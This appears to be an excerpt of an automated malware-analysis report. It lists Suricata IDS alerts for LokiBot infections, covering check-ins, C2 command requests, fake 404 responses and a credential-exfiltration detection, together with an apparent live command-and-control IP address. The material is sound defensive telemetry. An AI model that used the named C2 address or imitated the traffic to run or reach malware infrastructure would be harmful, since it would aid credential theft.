                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49733
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49739
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49811 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49773
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49822 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49842 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49755
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49744
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49828 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49811 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49811 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49763
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49842 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49842 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49735
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49842 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49822 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49822 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49738
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49811 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49828 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49811 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49737
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49761
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49883 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49758
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49883 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49842 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49757
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49811
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49780
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49864 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49864 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49836 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49842
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49805 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49740
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49883 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49822
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49752
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49864 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49828 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49894 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49828 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49828 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49836
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49779
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49765
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49894 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49749
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49883 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49883 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49776
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49828
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49734
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49864 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49947 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49782
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49751
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49768
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49771
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49864 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49954 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49894 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49947 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49894 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49894 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49864
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49894
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49954 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49760
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49947 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49877 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49877 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49877 -> 94.156.177.220:80
